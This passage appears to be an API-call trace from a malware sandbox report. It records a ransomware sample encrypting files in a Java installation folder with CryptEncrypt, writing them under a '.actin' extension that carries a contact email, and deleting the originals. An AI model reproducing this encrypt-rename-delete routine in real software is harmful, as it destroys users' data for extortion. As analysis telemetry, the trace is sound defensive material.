hFile=0x2fc, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x3c40, lpOverlapped=0x0) returned 1 [0152.805] CryptEncrypt (in: hKey=0xac2db0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x3c50, dwBufLen=0x3c50 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x3c50) returned 1 [0152.805] WriteFile (in: hFile=0x2f0, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x3c50, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x3c50, lpOverlapped=0x0) returned 1 [0152.806] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac2ff0) returned 1 [0152.806] CryptSetKeyParam (hKey=0xac2ff0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0152.806] CryptEncrypt (in: hKey=0xac2ff0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0152.806] CryptDestroyKey (hKey=0xac2ff0) returned 1 [0152.806] WriteFile (in: hFile=0x2f0, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0152.806] CryptDestroyKey (hKey=0xac2db0) returned 1 [0152.806] CloseHandle (hObject=0x2fc) returned 1 [0152.806] CloseHandle (hObject=0x2f0) returned 1 [0152.807] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\resource.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\resource.dll")) returned 1 [0152.808] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0152.808] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\jvm.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0152.808] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=8809536) returned 1 [0152.808] CloseHandle (hObject=0x2f0) returned 1 [0152.808] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\jvm.dll")) returned 0x20 [0152.808] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\jvm.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\jvm.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 1 [0152.810] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\jvm.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0152.810] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af910 | out: lpNewFilePointer=0x0) returned 1 [0152.810] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af910 | out: lpNewFilePointer=0x0) returned 1 [0152.810] ReadFile (in: hFile=0x2f0, lpBuffer=0x3675058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32af91c, lpOverlapped=0x0 | out: lpBuffer=0x3675058*, lpNumberOfBytesRead=0x32af91c*=0x40000, lpOverlapped=0x0) returned 1 [0152.820] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x2ccec0, lpNewFilePointer=0x0, dwMoveMethod=0x32af910 | out: lpNewFilePointer=0x0) returned 1 [0152.820] ReadFile (in: hFile=0x2f0, lpBuffer=0x36b5058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32af91c, lpOverlapped=0x0 | out: lpBuffer=0x36b5058*, lpNumberOfBytesRead=0x32af91c*=0x40000, lpOverlapped=0x0) returned 1 [0152.831] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x826c40, lpNewFilePointer=0x0, dwMoveMethod=0x32af910 | out: lpNewFilePointer=0x0) returned 1 [0152.831] ReadFile (in: hFile=0x2f0, lpBuffer=0x36f5058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32af91c, lpOverlapped=0x0 | out: lpBuffer=0x36f5058*, lpNumberOfBytesRead=0x32af91c*=0x40000, lpOverlapped=0x0) returned 1 [0152.840] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af900, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af96c | out: phKey=0x32af96c*=0xac30b0) returned 1 [0152.840] CryptSetKeyParam (hKey=0xac30b0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0152.840] CryptEncrypt (in: hKey=0xac30b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af920*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x3675020*, pdwDataLen=0x32af920*=0xc0050) returned 1 [0152.841] CryptDestroyKey (hKey=0xac30b0) returned 1 [0152.841] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af948 | out: lpNewFilePointer=0x0) returned 1 [0152.841] WriteFile (in: hFile=0x2f0, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x32af958, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af958*=0xc0102, lpOverlapped=0x0) returned 1 [0152.957] SetEndOfFile (hFile=0x2f0) returned 1 [0152.957] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x826c40, lpNewFilePointer=0x0, dwMoveMethod=0x32af918 | out: lpNewFilePointer=0x0) returned 1 [0152.957] WriteFile (in: hFile=0x2f0, lpBuffer=0x373513a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32af924, lpOverlapped=0x0 | out: lpBuffer=0x373513a*, lpNumberOfBytesWritten=0x32af924*=0x40000, lpOverlapped=0x0) returned 1 [0152.959] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x2ccec0, lpNewFilePointer=0x0, dwMoveMethod=0x32af918 | out: lpNewFilePointer=0x0) returned 1 [0152.959] WriteFile (in: hFile=0x2f0, lpBuffer=0x373513a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32af924, lpOverlapped=0x0 | out: lpBuffer=0x373513a*, lpNumberOfBytesWritten=0x32af924*=0x40000, lpOverlapped=0x0) returned 1 [0152.963] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af918 | out: lpNewFilePointer=0x0) returned 1 [0152.963] WriteFile (in: hFile=0x2f0, lpBuffer=0x373513a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32af924, lpOverlapped=0x0 | out: lpBuffer=0x373513a*, lpNumberOfBytesWritten=0x32af924*=0x40000, lpOverlapped=0x0) returned 1 [0152.965] CloseHandle (hObject=0x2f0) returned 1 [0152.965] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0152.965] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\servertool.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\servertool.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0152.966] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=16448) returned 1 [0152.966] CloseHandle (hObject=0x2f0) returned 1 [0152.966] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\servertool.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\servertool.exe")) returned 0x20 [0152.966] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\servertool.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\servertool.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0152.966] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\servertool.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\servertool.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0152.966] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0152.966] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0152.967] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\servertool.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\servertool.exe.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0152.967] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac2df0) returned 1 [0152.967] CryptSetKeyParam (hKey=0xac2df0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0152.967] ReadFile (in: hFile=0x2f0, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x4040, lpOverlapped=0x0) returned 1 [0152.969] CryptEncrypt (in: hKey=0xac2df0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x4050, dwBufLen=0x4050 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x4050) returned 1 [0152.969] WriteFile (in: hFile=0x2dc, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x4050, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x4050, lpOverlapped=0x0) returned 1 [0152.970] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac2f30) returned 1 [0152.970] CryptSetKeyParam (hKey=0xac2f30, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0152.970] CryptEncrypt (in: hKey=0xac2f30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0152.970] CryptDestroyKey (hKey=0xac2f30) returned 1 [0152.970] WriteFile (in: hFile=0x2dc, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0152.970] CryptDestroyKey (hKey=0xac2df0) returned 1 [0152.970] CloseHandle (hObject=0x2f0) returned 1 [0152.970] CloseHandle (hObject=0x2dc) returned 1 [0152.970] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\servertool.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\servertool.exe")) returned 1 [0152.971] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0152.971] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\splashscreen.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\splashscreen.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0152.971] GetFileSizeEx (in: hFile=0x2dc, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=204864) returned 1 [0152.971] CloseHandle (hObject=0x2dc) returned 1 [0152.972] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\splashscreen.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\splashscreen.dll")) returned 0x20 [0152.972] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\splashscreen.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\splashscreen.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0152.972] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\splashscreen.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\splashscreen.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0152.972] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0152.972] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0152.972] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\splashscreen.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\splashscreen.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0152.973] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac33f0) returned 1 [0152.973] CryptSetKeyParam (hKey=0xac33f0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0152.973] ReadFile (in: hFile=0x2dc, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x32040, lpOverlapped=0x0) returned 1 [0152.977] CryptEncrypt (in: hKey=0xac33f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x32050, dwBufLen=0x32050 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x32050) returned 1 [0152.977] WriteFile (in: hFile=0x2f0, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x32050, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x32050, lpOverlapped=0x0) returned 1 [0152.983] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac3130) returned 1 [0152.983] CryptSetKeyParam (hKey=0xac3130, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0152.983] CryptEncrypt (in: hKey=0xac3130, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x50, dwBufLen=0x50 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x50) returned 1 [0152.983] CryptDestroyKey (hKey=0xac3130) returned 1 [0152.983] WriteFile (in: hFile=0x2f0, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x102, lpOverlapped=0x0) returned 1 [0152.983] CryptDestroyKey (hKey=0xac33f0) returned 1 [0152.983] CloseHandle (hObject=0x2dc) returned 1 [0152.983] CloseHandle (hObject=0x2f0) returned 1 [0152.983] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\splashscreen.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\splashscreen.dll")) returned 1 [0152.985] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0152.985] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssv.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ssv.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0153.137] GetFileSizeEx (in: hFile=0x2dc, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=571968) returned 1 [0153.137] CloseHandle (hObject=0x2dc) returned 1 [0153.137] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssv.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ssv.dll")) returned 0x20 [0153.137] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssv.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ssv.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.137] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssv.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ssv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0153.137] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.138] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.138] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssv.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ssv.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0153.138] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac3430) returned 1 [0153.138] CryptSetKeyParam (hKey=0xac3430, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.138] ReadFile (in: hFile=0x2dc, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x8ba40, lpOverlapped=0x0) returned 1 [0153.149] CryptEncrypt (in: hKey=0xac3430, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x8ba50, dwBufLen=0x8ba50 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x8ba50) returned 1 [0153.150] WriteFile (in: hFile=0x2f8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x8ba50, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x8ba50, lpOverlapped=0x0) returned 1 [0153.161] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac2eb0) returned 1 [0153.161] CryptSetKeyParam (hKey=0xac2eb0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.161] CryptEncrypt (in: hKey=0xac2eb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x30, dwBufLen=0x30 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x30) returned 1 [0153.161] CryptDestroyKey (hKey=0xac2eb0) returned 1 [0153.161] WriteFile (in: hFile=0x2f8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xe2, lpOverlapped=0x0) returned 1 [0153.161] CryptDestroyKey (hKey=0xac3430) returned 1 [0153.161] CloseHandle (hObject=0x2dc) returned 1 [0153.161] CloseHandle (hObject=0x2f8) returned 1 [0153.162] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssv.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ssv.dll")) returned 1 [0153.167] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0153.167] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\unpack.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0153.167] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=79936) returned 1 [0153.167] CloseHandle (hObject=0x2f8) returned 1 [0153.167] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\unpack.dll")) returned 0x20 [0153.167] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\unpack.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.167] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\unpack.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0153.167] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.168] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.168] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\unpack.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0153.169] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac2db0) returned 1 [0153.169] CryptSetKeyParam (hKey=0xac2db0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.169] ReadFile (in: hFile=0x2f8, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x13840, lpOverlapped=0x0) returned 1 [0153.280] CryptEncrypt (in: hKey=0xac2db0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x13850, dwBufLen=0x13850 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x13850) returned 1 [0153.280] WriteFile (in: hFile=0x2dc, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x13850, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x13850, lpOverlapped=0x0) returned 1 [0153.282] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac2eb0) returned 1 [0153.282] CryptSetKeyParam (hKey=0xac2eb0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.282] CryptEncrypt (in: hKey=0xac2eb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0153.282] CryptDestroyKey (hKey=0xac2eb0) returned 1 [0153.282] WriteFile (in: hFile=0x2dc, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0153.282] CryptDestroyKey (hKey=0xac2db0) returned 1 [0153.282] CloseHandle (hObject=0x2f8) returned 1 [0153.283] CloseHandle (hObject=0x2dc) returned 1 [0153.283] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\unpack.dll")) returned 1 [0153.284] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0153.284] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\wsdetect.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\wsdetect.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0153.285] GetFileSizeEx (in: hFile=0x2dc, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=192576) returned 1 [0153.285] CloseHandle (hObject=0x2dc) returned 1 [0153.285] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\wsdetect.dll" (normalized: "c:\\program 